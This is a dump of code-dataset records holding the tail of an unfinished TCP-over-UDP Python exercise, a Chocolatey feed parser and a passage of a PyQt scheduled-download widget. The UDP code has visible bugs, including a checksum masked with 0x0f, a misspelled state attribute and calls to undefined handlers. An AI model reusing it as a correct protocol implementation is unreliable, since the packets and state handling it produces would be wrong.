socket.htons(tcp_checksum)\r\n # now place the checksum into the packet data\r\n tcp_buffer = bytearray(tcp_packet)\r\n tcp_buffer[16] = (tcp_checksum >> 8) & 0x0f\r\n tcp_buffer[17] = (tcp_checksum & 0x0f)\r\n\r\n return bytes(tcp_buffer)\r\n\r\n def increment_seq_no(self):\r\n self.seq_no = self.seq_no + 1\r\n\r\n def syn(self):\r\n # set the TCP header fields for the SYN packet\r\n return self.with_checksum(\r\n struct.pack(\r\n \"!HHIIBBHHHBBH\",\r\n self.src_port, # 16-bits\r\n self.dst_port, # 16-bits\r\n self.seq_no, # 32-bits\r\n self.ack_no, # 32-bits\r\n 5 << 4, # 8-bits, offset + reserved\r\n int(ControlBits.SYN), # 8-bits, control bits (SYN)\r\n self.window_size, # 16-bits window size\r\n 0, # 16-bits, checksum (should be set to zero)\r\n 0, # 16-bits, urgent pointer (should be set to zero)\r\n 2, # option-kind (maximum segment size)\r\n 4, # option-length\r\n self.mss, # maximum segment size\r\n )\r\n )\r\n \r\n def syn_ack(self):\r\n # set the TCP header fields for the SYN packet\r\n return self.with_checksum(\r\n struct.pack(\r\n \"!HHIIBBHHHBBH\",\r\n self.src_port,\r\n self.dst_port,\r\n self.seq_no,\r\n self.ack_no,\r\n 5 << 4,\r\n int(ControlBits.SYN | ControlBits.ACK), # 8-bits\r\n self.window_size, # 16-bits window size\r\n 0, # 16-bits, checksum (should be set to zero)\r\n 0, # 16-bits, urgent pointer (should be set to zero) \r\n 2, # option-kind (maximum segment size)\r\n 4, # option-length\r\n self.mss, # maximum segment size\r\n )\r\n )\r\n\r\n def ack(self):\r\n # set the TCP header fields for the SYN packet\r\n return self.with_checksum(\r\n struct.pack(\r\n \"!HHIIBBHHH\",\r\n self.src_port,\r\n self.dst_port,\r\n self.seq_no,\r\n self.ack_no,\r\n 0,\r\n int(ControlBits.ACK), # 8-bits\r\n self.window_size, # 16-bits window size\r\n 0, # 16-bits, checksum (should be set to zero)\r\n 0 # 16-bits, urgent pointer (should be set to zero) \r\n )\r\n )\r\n\r\n def fin(self):\r\n return self.with_checksum(\r\n struct.pack(\r\n \"!HHIIBBHHH\",\r\n self.src_port,\r\n self.dst_port,\r\n self.seq_no,\r\n self.ack_no,\r\n 0,\r\n int(ControlBits.FIN), # 8-bits\r\n self.window_size, # 16-bits window size\r\n 0, # 16-bits, checksum 
(should be set to zero)\r\n 0 # 16-bits, urgent pointer (should be set to zero) \r\n )\r\n )\r\n\r\n\r\n def fsm_closed(self, packet: Packet):\r\n # The socket is currently closed and not listening. Normally, we should\r\n # not be able to exit this state from an incoming packet.\r\n logger.info(f'fsm_closed({self.state}): packet = {packet}')\r\n\r\n def fsm_listen(self, packet: Packet):\r\n logger.info(f'fsm_listen({self.state}): packet = {packet}')\r\n\r\n # The connection is listening\r\n if packet.is_syn:\r\n # establish our endpoint information\r\n self.dst_addr = packet.addr[0]\r\n self.dst_port = packet.addr[1]\r\n self.dst_inet = socket.inet_aton(self.dst_addr)\r\n # establish our sequence number\r\n self.seq_no = random.randint(0, max_initial_sequence_no)\r\n # set our acknowlegement to their sequence number\r\n self.ack_no = packet.seq_no\r\n # send a syn-ack\r\n self.send_packet(self.syn_ack())\r\n self.state = States.SYN_RECEIVED\r\n else:\r\n logger.warn(f'fsm_listen({self.state}): unexpected')\r\n\r\n # the connection is in SYN_RECEIVED\r\n def fsm_syn_received(self, packet: Packet):\r\n logger.info(f'fsm_syn_received({self.state}): packet = {packet}')\r\n\r\n if packet.is_ack:\r\n self.state = States.ESTABLISHED\r\n elif packet.is_fin:\r\n self.state = States.CLOSING\r\n else:\r\n logger.warn(f'fsm_syn_received({self.state}): unexpected')\r\n\r\n # the connection is in SYN_SENT\r\n def fsm_syn_sent(self, packet: Packet):\r\n logger.info(f'fsm_syn_sent({self.state}): packet = {packet}')\r\n if packet.is_syn_ack:\r\n self.state = States.ESTABLISHED\r\n #\r\n self.ack_no = packet.seq_no\r\n # send an ack\r\n self.send_packet(self.ack())\r\n self.states = States.ESTABLISHED\r\n else:\r\n logger.warn(f'fsm_syn_sent({self.state}): unexpected')\r\n\r\n def fsm_established(self, packet: Packet):\r\n logger.info(f'fsm_established({self.state}): packet = {packet}')\r\n if packet.is_fin:\r\n self.send_packet(self.ack())\r\n self.state = States.CLOSE_WAIT\r\n else:\r\n logger.warn(f'fsm_established({self.state}): unexpected')\r\n\r\n\r\n\r\n def fsm_fin_wait_1(self, packet: Packet):\r\n logger.info(f'fsm_fin_wait_1({self.state}): packet = {packet}')\r\n if packet.is_fin_ack:\r\n self.send_packet(self.ack())\r\n self.state = States.TIME_WAIT\r\n elif packet.is_fin:\r\n self.send_packet(self.ack())\r\n self.state = States.CLOSING\r\n elif packet.is_ack:\r\n self.state = States.FIN_WAIT_2\r\n else:\r\n logger.warn(f'fsm_fin_wait_1({self.state}): unexpected')\r\n\r\n\r\n def fsm_fin_wait_2(self, packet: Packet):\r\n logger.info(f'fsm_fin_wait_2({self.state}): packet = {packet}')\r\n if packet.is_fin:\r\n self.send_packet(self.ack())\r\n self.state = States.TIME_WAIT\r\n else:\r\n logger.warn(f'fsm_fin_wait_2({self.state}): unexpected')\r\n\r\n\r\n def fsm_closing(self, packet: Packet):\r\n logger.info(f'fsm_closing({self.state}): packet = {packet}')\r\n if packet.is_ack:\r\n self.state = States.TIME_WAIT\r\n else:\r\n logger.warn(f'fsm_closing({self.state}): unexpected')\r\n\r\n\r\n # Receives and processes a packet. 
The processing of a packet examines the\r\n # current state of the 'state machine' and determines how the packet should\r\n # be processed.\r\n\r\n async def recv_packet(self, packet: Packet):\r\n logger.info(f'recv_packet({self.state}): {self.src_addr}:{self.src_port} => {packet}')\r\n\r\n try:\r\n # handles an incoming packet from the parent handler\r\n if self.state == States.CLOSED:\r\n self.fsm_closed(packet)\r\n elif self.state == States.LISTEN:\r\n self.fsm_listen(packet)\r\n elif self.state == States.SYN_RECEIVED:\r\n self.fsm_syn_received(packet)\r\n elif self.state == States.SYN_SENT:\r\n self.fsm_syn_sent(packet)\r\n elif self.state == States.ESTABLISHED:\r\n self.fsm_established(packet)\r\n elif self.state == States.CLOSING:\r\n self.fsm_closing(packet)\r\n elif self.state == States.CLOSE_WAIT:\r\n self.fsm_close_wait(packet)\r\n elif self.state == States.LAST_ACK:\r\n self.fsm_last_ack(packet)\r\n elif self.state == States.FIN_WAIT_1:\r\n self.fsm_fin_wait_1(packet)\r\n elif self.state == States.FIN_WAIT_2:\r\n self.fsm_fin_wait_2(packet)\r\n elif self.state == States.TIME_WAIT:\r\n self.fsm_fin_time_wait(packet)\r\n finally:\r\n logger.info(f'recv_packet({self.state}): finished')\r\n\r\n # Sends a packet to the remote end. This method does not change state, please\r\n # handle that elsewhere.\r\n\r\n def send_packet(self, message: bytes, increment_seq_no: bool = True):\r\n logger.info(f'send_packet({self.state}): {message}')\r\n self.sock.sendto(message, (self.dst_addr, self.dst_port))\r\n if increment_seq_no:\r\n self.seq_no += 1\r\n\r\n # wait for the next packet\r\n\r\n async def wait_packet(self):\r\n # receive the raw wire message\r\n (data, addr) = self.sock.recvfrom(4096)\r\n # decode into a packet\r\n packet = Packet(data, addr)\r\n # check the header against the incoming source\r\n if (packet.src_port != addr[1]):\r\n # protocol spoofing\r\n raise ValueError(f'Protocol spoofing, source port {packet.src_port} <> {addr[1]}')\r\n\r\n return packet\r\n\r\n # wait for one cycle in the state machine\r\n\r\n async def wait_one(self):\r\n logger.info(f'wait_one({self.state}): starting')\r\n\r\n try:\r\n while True:\r\n try:\r\n # wait for a packet\r\n packet = await self.wait_packet()\r\n # if there is no packet keep waiting\r\n if packet is None:\r\n continue\r\n # receive the packet into the state machine\r\n await self.recv_packet(packet)\r\n # return if there is no exception\r\n return\r\n except socket.timeout:\r\n pass\r\n finally:\r\n logger.info(f'wait_one({self.state}): finished')\r\n\r\n # wait until one of the target states is achieved\r\n\r\n async def wait_until(self, states):\r\n while True:\r\n if (self.state in states):\r\n return\r\n\r\n await self.wait_one()\r\n\r\n # Starts a connection with the remote end. 
Sends a SYN packet and sets the\r\n # connection state to SYN_SENT.\r\n\r\n async def connect(self, dst_addr: str, dst_port: int):\r\n logger.info(f'connect({self.state}): start')\r\n\r\n try:\r\n self.dst_addr = socket.gethostbyname(dst_addr)\r\n self.dst_port = dst_port\r\n self.dst_inet = socket.inet_aton(self.dst_addr)\r\n # create a sequence number\r\n self.seq_no = random.randint(0, max_initial_sequence_no)\r\n # set the ack number\r\n self.ack_no = 0\r\n # create a SYN packet to send to the client\r\n self.send_packet(self.syn())\r\n self.state = States.SYN_SENT\r\n # process incoming messages until we reach the\r\n # established state or a terminal state\r\n await self.wait_until((States.ESTABLISHED, States.CLOSED))\r\n finally:\r\n logger.info(f'connect({self.state}): finished')\r\n\r\n # Sends a \"message\" (do not confuse with send packet)\r\n \r\n def send_message(self, message: bytes):\r\n # verify that the connection is in a valid state\r\n assert(self.state == States.ESTABLISHED)\r\n # send the message\r\n # TBD\r\n\r\n # Closes the connection\r\n\r\n async def close(self):\r\n # if the connection is already terminating\r\n if (self.state in (States.CLOSED, States.CLOSING, States.CLOSE_WAIT, States.FIN_WAIT_1, States.FIN_WAIT_2, States.TIME_WAIT)):\r\n return\r\n elif (self.state in (States.SYN_RECEIVED, States.ESTABLISHED)):\r\n self.send_packet(self.fin())\r\n self.state = States.FIN_WAIT_1\r\n await self.wait_until((States.CLOSED,))\r\n elif (self.state == States.SYN_SENT):\r\n self.state = States.CLOSED\r\n elif (self.state == States.LISTEN):\r\n self.state = States.CLOSED\r\n else:\r\n logger.warn(f'close(): Unhandled state transition: state = {self.state}')\r\n\r\n\r\nclass RUDPClient(socket.socket):\r\n def __init__(self):\r\n self.connection = None\r\n\r\n async def send_message(self, message: bytes):\r\n assert(self.connection is not None)\r\n self.connection.send_message(bytes)\r\n\r\n async def close(self):\r\n assert(self.connection is not None)\r\n await self.connection.close()\r\n\r\n async def connect(self, host: str, port: int):\r\n # create the socket (for communication)\r\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\r\n self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n # bind the local address (random port) for return messages\r\n self.sock.bind(('', 0))\r\n # set the socket timeout so that we do not block indefinitely\r\n self.sock.settimeout(1.0)\r\n # bind it to a connection\r\n self.connection = Connection(self.sock, States.CLOSED)\r\n # establish the connection\r\n await self.connection.connect(host, port)\r\n # return the connection\r\n return self.connection\r\n\r\n# The reliable udp server is a multiplexing listening entity. 
It creates a socket for handling\r\n# incoming requests and creates 'connections' (state machines) in response to inbound requests.\r\n# In practice, you would want to limit these in the way that listen() and accept() do, but for\r\n# this exercise, the connection are effectively unbound.\r\n\r\nclass RUDPServer:\r\n def __init__(self):\r\n self.connections = {}\r\n\r\n async def listen(self, port: int):\r\n self.host = '127.0.0.1' # temporary\r\n self.port = port\r\n logger.info(f'listen(): port = {port}')\r\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n logger.info(f'listen(): socket = {self.sock}')\r\n self.sock.bind((self.host, self.port))\r\n # set the socket timeout so that we do not block indefinitely\r\n self.sock.settimeout(1.0)\r\n logger.info('listen(): socket bound')\r\n \r\n async def recv_packet(self):\r\n \"\"\"Waits for a single packet to arrive\"\"\"\r\n try:\r\n # receive the raw wire message\r\n (data, addr) = self.sock.recvfrom(4096)\r\n # decode into a packet\r\n packet = Packet(data, addr)\r\n # check the header against the incoming source\r\n if (packet.src_port != addr[1]):\r\n # protocol spoofing\r\n raise ValueError(f'Protocol spoofing, source port {packet.src_port} <> {addr[1]}')\r\n\r\n return packet\r\n except socket.timeout:\r\n #logger.warn('timeout exception on socket')\r\n pass\r\n\r\n async def dispatch(self):\r\n # the dispatch method is a state machine for the endpoint\r\n logger.debug('dispatch(): starting')\r\n\r\n # handle the next incoming packet\r\n while True:\r\n packet = await self.recv_packet()\r\n if packet is None:\r\n continue\r\n\r\n # now at this point we have received a packet but we are multiplexing\r\n # many different psuedo connections... moreover, this packet may belong\r\n # to one or it may not belong to any connection. 
we need to determine\r\n # where this connection belongs.\r\n connection = self.connections.get(packet.addr)\r\n if connection is None:\r\n logger.info(f'dispatch(): new connection for {packet.addr}')\r\n # create the connection (state machine)\r\n self.connections[packet.addr] = connection = Connection(self.sock, States.LISTEN) \r\n\r\n await connection.recv_packet(packet)\r\n", "repo_name": "ajaxx/tcp-over-udp", "sub_path": "reliable_udp.py", "file_name": "reliable_udp.py", "file_ext": "py", "file_size_in_byte": 20815, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "enum.IntEnum", "line_number": 15, "usage_type": "name"}, {"api_name": "enum.IntEnum", "line_number": 25, "usage_type": "name"}, {"api_name": "struct.unpack", "line_number": 50, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 82, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 136, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 136, "usage_type": "name"}, {"api_name": "socket.inet_aton", "line_number": 142, "usage_type": "call"}, {"api_name": "socket.htons", "line_number": 172, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 186, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 206, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 226, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 242, "usage_type": "call"}, {"api_name": "socket.inet_aton", "line_number": 270, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 272, "usage_type": "call"}, {"api_name": "utils.States.SYN_RECEIVED", "line_number": 277, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 277, "usage_type": "name"}, {"api_name": "utils.States.ESTABLISHED", "line_number": 286, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 286, "usage_type": "name"}, {"api_name": "utils.States.CLOSING", "line_number": 288, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 288, "usage_type": "name"}, {"api_name": "utils.States.ESTABLISHED", "line_number": 296, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 296, "usage_type": "name"}, {"api_name": "utils.States.ESTABLISHED", "line_number": 301, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 301, "usage_type": "name"}, {"api_name": "utils.States.CLOSE_WAIT", "line_number": 309, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 309, "usage_type": "name"}, {"api_name": "utils.States.TIME_WAIT", "line_number": 319, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 319, "usage_type": "name"}, {"api_name": "utils.States.CLOSING", "line_number": 322, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 322, "usage_type": "name"}, {"api_name": "utils.States.FIN_WAIT_2", "line_number": 324, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 324, "usage_type": "name"}, {"api_name": "utils.States.TIME_WAIT", "line_number": 333, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 333, "usage_type": "name"}, {"api_name": "utils.States.TIME_WAIT", "line_number": 341, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 341, "usage_type": "name"}, {"api_name": "utils.States.CLOSED", "line_number": 355, 
"usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 355, "usage_type": "name"}, {"api_name": "utils.States.LISTEN", "line_number": 357, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 357, "usage_type": "name"}, {"api_name": "utils.States.SYN_RECEIVED", "line_number": 359, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 359, "usage_type": "name"}, {"api_name": "utils.States.SYN_SENT", "line_number": 361, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 361, "usage_type": "name"}, {"api_name": "utils.States.ESTABLISHED", "line_number": 363, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 363, "usage_type": "name"}, {"api_name": "utils.States.CLOSING", "line_number": 365, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 365, "usage_type": "name"}, {"api_name": "utils.States.CLOSE_WAIT", "line_number": 367, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 367, "usage_type": "name"}, {"api_name": "utils.States.LAST_ACK", "line_number": 369, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 369, "usage_type": "name"}, {"api_name": "utils.States.FIN_WAIT_1", "line_number": 371, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 371, "usage_type": "name"}, {"api_name": "utils.States.FIN_WAIT_2", "line_number": 373, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 373, "usage_type": "name"}, {"api_name": "utils.States.TIME_WAIT", "line_number": 375, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 375, "usage_type": "name"}, {"api_name": "socket.timeout", "line_number": 420, "usage_type": "attribute"}, {"api_name": "socket.gethostbyname", "line_number": 441, "usage_type": "call"}, {"api_name": "socket.inet_aton", "line_number": 443, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 445, "usage_type": "call"}, {"api_name": "utils.States.SYN_SENT", "line_number": 450, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 450, "usage_type": "name"}, {"api_name": "utils.States.ESTABLISHED", "line_number": 453, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 453, "usage_type": "name"}, {"api_name": "utils.States.CLOSED", "line_number": 453, "usage_type": "attribute"}, {"api_name": "utils.States.ESTABLISHED", "line_number": 461, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 461, "usage_type": "name"}, {"api_name": "utils.States.CLOSED", "line_number": 469, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 469, "usage_type": "name"}, {"api_name": "utils.States.CLOSING", "line_number": 469, "usage_type": "attribute"}, {"api_name": "utils.States.CLOSE_WAIT", "line_number": 469, "usage_type": "attribute"}, {"api_name": "utils.States.FIN_WAIT_1", "line_number": 469, "usage_type": "attribute"}, {"api_name": "utils.States.FIN_WAIT_2", "line_number": 469, "usage_type": "attribute"}, {"api_name": "utils.States.TIME_WAIT", "line_number": 469, "usage_type": "attribute"}, {"api_name": "utils.States.SYN_RECEIVED", "line_number": 471, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 471, "usage_type": "name"}, {"api_name": "utils.States.ESTABLISHED", "line_number": 471, "usage_type": "attribute"}, {"api_name": "utils.States.FIN_WAIT_1", "line_number": 473, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 473, 
"usage_type": "name"}, {"api_name": "utils.States.CLOSED", "line_number": 474, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 474, "usage_type": "name"}, {"api_name": "utils.States.SYN_SENT", "line_number": 475, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 475, "usage_type": "name"}, {"api_name": "utils.States.CLOSED", "line_number": 476, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 476, "usage_type": "name"}, {"api_name": "utils.States.LISTEN", "line_number": 477, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 477, "usage_type": "name"}, {"api_name": "utils.States.CLOSED", "line_number": 478, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 478, "usage_type": "name"}, {"api_name": "socket.socket", "line_number": 483, "usage_type": "attribute"}, {"api_name": "socket.socket", "line_number": 497, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 497, "usage_type": "attribute"}, {"api_name": "socket.SOCK_DGRAM", "line_number": 497, "usage_type": "attribute"}, {"api_name": "socket.IPPROTO_UDP", "line_number": 497, "usage_type": "attribute"}, {"api_name": "socket.SOL_SOCKET", "line_number": 498, "usage_type": "attribute"}, {"api_name": "socket.SO_REUSEADDR", "line_number": 498, "usage_type": "attribute"}, {"api_name": "utils.States.CLOSED", "line_number": 504, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 504, "usage_type": "name"}, {"api_name": "socket.socket", "line_number": 523, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 523, "usage_type": "attribute"}, {"api_name": "socket.SOCK_DGRAM", "line_number": 523, "usage_type": "attribute"}, {"api_name": "socket.timeout", "line_number": 543, "usage_type": "attribute"}, {"api_name": "utils.States.LISTEN", "line_number": 565, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 565, "usage_type": "name"}]}
+{"seq_id": "11127441937", "text": "import os\nimport xml.etree.ElementTree\n\nfrom repology.package import Package\n\n\nclass ChocolateyParser():\n def __init__(self):\n pass\n\n def Parse(self, path):\n result = []\n\n for pagepath in os.listdir(path):\n if not pagepath.endswith('.xml'):\n continue\n\n root = xml.etree.ElementTree.parse(os.path.join(path, pagepath))\n\n for entry in root.findall('{http://www.w3.org/2005/Atom}entry'):\n pkg = Package()\n pkg.name = entry.find('{http://www.w3.org/2005/Atom}title').text\n pkg.version = entry.find('{http://schemas.microsoft.com/ado/2007/08/dataservices/metadata}properties/{http://schemas.microsoft.com/ado/2007/08/dataservices}Version').text\n pkg.homepage = entry.find('{http://schemas.microsoft.com/ado/2007/08/dataservices/metadata}properties/{http://schemas.microsoft.com/ado/2007/08/dataservices}ProjectUrl').text\n\n commentnode = entry.find('{http://www.w3.org/2005/Atom}summary')\n if commentnode is not None:\n pkg.comment = commentnode.text\n\n result.append(pkg)\n\n return result\n", "repo_name": "roscopecoltran/sniperkit-services", "sub_path": "dockerfiles/vcs/packages/repology/repology/parser/chocolatey.py", "file_name": "chocolatey.py", "file_ext": "py", "file_size_in_byte": 1187, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.listdir", "line_number": 14, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.etree.ElementTree.parse", "line_number": 18, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.etree", "line_number": 18, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 18, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "repology.package.Package", "line_number": 21, "usage_type": "call"}]}
+{"seq_id": "20053147074", "text": "from Core.Ui import *\nfrom Services.Messages import Messages\nfrom Services.Twitch.GQL import TwitchGQLModels\nfrom Download.Downloader.Core.StreamDownloader import StreamDownloader\nfrom Download import ScheduledDownloadPreset\nfrom Ui.Components.Widgets.WidgetRemoveController import WidgetRemoveController\n\nimport uuid\n\n\nclass ScheduledDownloadPreview(QtWidgets.QWidget):\n resizedSignal = QtCore.pyqtSignal()\n\n def __init__(self, scheduledDownloadId: uuid.UUID, parent: QtWidgets.QWidget | None = None):\n super().__init__(parent=parent)\n self.scheduledDownloadId = scheduledDownloadId\n self._downloader: StreamDownloader | None = None\n self._widgetRemoveController = WidgetRemoveController(parent=self)\n self._widgetRemoveController.performRemove.connect(self.removeScheduledDownload)\n self._ui = UiLoader.load(\"scheduledDownloadPreview\", self)\n self._ui.downloadViewControlBar = Utils.setPlaceholder(self._ui.downloadViewControlBar, Ui.DownloadViewControlBar(parent=self))\n self._ui.downloaderView = Utils.setPlaceholder(self._ui.downloaderView, Ui.DownloaderView(parent=self))\n self._ui.downloaderView.resizedSignal.connect(self.resizedSignal, QtCore.Qt.ConnectionType.QueuedConnection)\n self._ui.downloadViewControlBar.openFolderButton.clicked.connect(self.openFolder)\n self._ui.downloadViewControlBar.openFolderButton.setVisible()\n self._ui.downloadViewControlBar.openFileButton.clicked.connect(self.openFile)\n self._ui.downloadViewControlBar.openFileButton.setDisabled()\n self.scheduledDownload = App.ScheduledDownloadManager.get(self.scheduledDownloadId)\n self.scheduledDownload.activeChanged.connect(self._activeChanged)\n self._activeChanged()\n self.scheduledDownload.channelDataUpdateStarted.connect(self._channelDataUpdateStarted)\n self.scheduledDownload.channelDataUpdateFinished.connect(self._channelDataUpdateFinished)\n self.scheduledDownload.channelDataUpdated.connect(self._showChannel)\n self.scheduledDownload.pubSubStateChanged.connect(self._showPubSubState)\n self.scheduledDownload.status.updated.connect(self._statusUpdated)\n self._statusUpdated()\n if self.scheduledDownload.isUpdatingChannelData():\n self._channelDataUpdateStarted()\n else:\n self._channelDataUpdateFinished()\n self._showChannel()\n self._showPubSubState()\n self._ui.networkAlertIcon = Utils.setSvgIcon(self._ui.networkAlertIcon, Icons.ALERT_RED_ICON)\n self._ui.enableButton.clicked.connect(self._enableButtonClicked)\n self._ui.refreshButton.clicked.connect(self.scheduledDownload.updateChannelData)\n self._ui.settingsButton.clicked.connect(self.editScheduledDownload)\n self._ui.deleteButton.clicked.connect(self.tryRemoveScheduledDownload)\n\n def showEvent(self, event: QtGui.QShowEvent) -> None:\n self.resizedSignal.emit()\n super().showEvent(event)\n\n def _activeChanged(self) -> None:\n self._ui.downloaderArea.setEnabled(self.scheduledDownload.isActive())\n self._ui.enableButton.setIcon(QtGui.QIcon(Icons.TOGGLE_ON_ICON if self.scheduledDownload.isEnabled() else Icons.TOGGLE_OFF_ICON))\n\n def _enableButtonClicked(self) -> None:\n if self.scheduledDownload.isActive():\n if self.scheduledDownload.status.isDownloading():\n if not Utils.ask(*Messages.ASK.STOP_DOWNLOAD, parent=self):\n return\n self.scheduledDownload.setEnabled(not self.scheduledDownload.isEnabled())\n\n def _statusUpdated(self) -> None:\n if self.scheduledDownload.status.isNone():\n self._ui.downloaderView.setStatusVisible(False)\n elif self.scheduledDownload.status.isGeneratingPlayback():\n 
self._ui.downloaderView.showAlert(T(\"preparing\", ellipsis=True))\n self._ui.downloaderView.setStatusVisible(True)\n elif self.scheduledDownload.status.isDownloading():\n self.connectDownloader(self.scheduledDownload.downloader)\n elif self.scheduledDownload.status.isError():\n self._ui.downloaderView.showError(self.scheduledDownload.status.getError())\n self._ui.downloaderView.setStatusVisible(True)\n if isinstance(self.scheduledDownload.status.getError(), ScheduledDownloadPreset.Exceptions.PreferredResolutionNotFound) and App.Preferences.general.isNotifyEnabled():\n App.Instance.notification.toastMessage(\n title=T(\"preferred-resolution-not-found\"),\n message=f\"{T('#Unable to start scheduled download for channel {channel}.', channel=self.scheduledDownload.channel.formattedName)}\\n{T('started-at')}: {self.scheduledDownload.channel.stream.createdAt.toTimeZone(App.Preferences.localization.getTimezone()).toString('yyyy-MM-dd HH:mm:ss')}\",\n icon=App.Instance.notification.Icons.Warning\n )\n elif self.scheduledDownload.status.isDownloaderError():\n self._ui.downloaderView.showError(self.scheduledDownload.status.getError(), downloadAborted=True)\n self._ui.downloaderView.setStatusVisible(True)\n\n def connectDownloader(self, downloader: StreamDownloader) -> None:\n self.disconnectDownloader()\n self._widgetRemoveController.setRemoveEnabled(False)\n self._downloader = downloader\n self._downloader.status.updated.connect(self._handleDownloadStatus)\n self._downloader.finished.connect(self._handleDownloadResult)\n self._handleDownloadStatus()\n self._ui.downloadViewControlBar.showDownloadInfo(self._downloader.downloadInfo)\n self._ui.downloadViewControlBar.openFileButton.setVisible()\n self._ui.downloaderView.connectDownloader(self._downloader)\n\n def disconnectDownloader(self) -> None:\n if self._downloader != None:\n self._ui.downloaderView.disconnectDownloader()\n self._downloader.status.updated.disconnect(self._handleDownloadStatus)\n self._downloader.finished.disconnect(self._handleDownloadResult)\n self._downloader = None\n self._showChannel()\n self._ui.downloadViewControlBar.openFileButton.setDisabled()\n self._widgetRemoveController.setRemoveEnabled(True)\n\n def _handleDownloadStatus(self) -> None:\n if self._downloader.status.terminateState.isInProgress():\n self._ui.enableButton.setEnabled(False)\n self._ui.refreshButton.setEnabled(False)\n\n def _handleDownloadResult(self) -> None:\n if self._downloader.status.terminateState.isTrue():\n self._ui.enableButton.setEnabled(True)\n self._ui.refreshButton.setEnabled(True)\n self.disconnectDownloader()\n\n def _channelDataUpdateStarted(self) -> None:\n self._ui.refreshButton.setEnabled(False)\n if not self.scheduledDownload.isChannelRetrieved():\n self._showNetworkStatus(T(\"loading-channel-data\", ellipsis=True))\n\n def _channelDataUpdateFinished(self) -> None:\n self._ui.refreshButton.setEnabled(True)\n if not self.scheduledDownload.isChannelRetrieved():\n self._showNetworkStatus(T(\"channel-not-found\"))\n\n def _showChannel(self) -> None:\n if self.scheduledDownload.channel == None:\n target = TwitchGQLModels.Channel({\"displayName\": self.scheduledDownload.preset.channel})\n elif self.scheduledDownload.channel.stream == None:\n target = self.scheduledDownload.channel\n else:\n target = self.scheduledDownload.channel.stream\n if self._downloader == None:\n self._ui.downloadViewControlBar.showContentInfo(target)\n self._ui.downloaderView.updateContentInfo(target, immediateRefresh=False)\n elif isinstance(target, 
TwitchGQLModels.Stream):\n downloadInfo = self._downloader.downloadInfo.copy()\n downloadInfo.updateContent(target)\n self._ui.downloadViewControlBar.showDownloadInfo(downloadInfo)\n self._ui.downloaderView.updateContentInfo(downloadInfo, immediateRefresh=False)\n\n def _showPubSubState(self) -> None:\n if not self.scheduledDownload.isActive():\n self._showNetworkStatus(T(\"deactivated\"))\n elif self.scheduledDownload.isSubscribed():\n self._showNetworkStatus()\n elif self.scheduledDownload.isConnecting():\n self._showNetworkStatus(T(\"connecting\", ellipsis=True))\n else:\n self._showNetworkStatus(T(\"not-connected\"))\n\n def _showNetworkStatus(self, text: str | None = None) -> None:\n if text == None:\n self._ui.networkStatusArea.hide()\n else:\n self._ui.networkStatusArea.show()\n self._ui.networkStatus.setText(text)\n self.resizedSignal.emit()\n\n def openFolder(self) -> None:\n try:\n Utils.openFolder(self.scheduledDownload.preset.directory)\n except:\n Utils.info(*Messages.INFO.FOLDER_NOT_FOUND, parent=self)\n\n def openFile(self) -> None:\n try:\n Utils.openFolder(self.scheduledDownload.downloader.downloadInfo.getAbsoluteFileName())\n except:\n Utils.info(*Messages.INFO.FOLDER_NOT_FOUND, 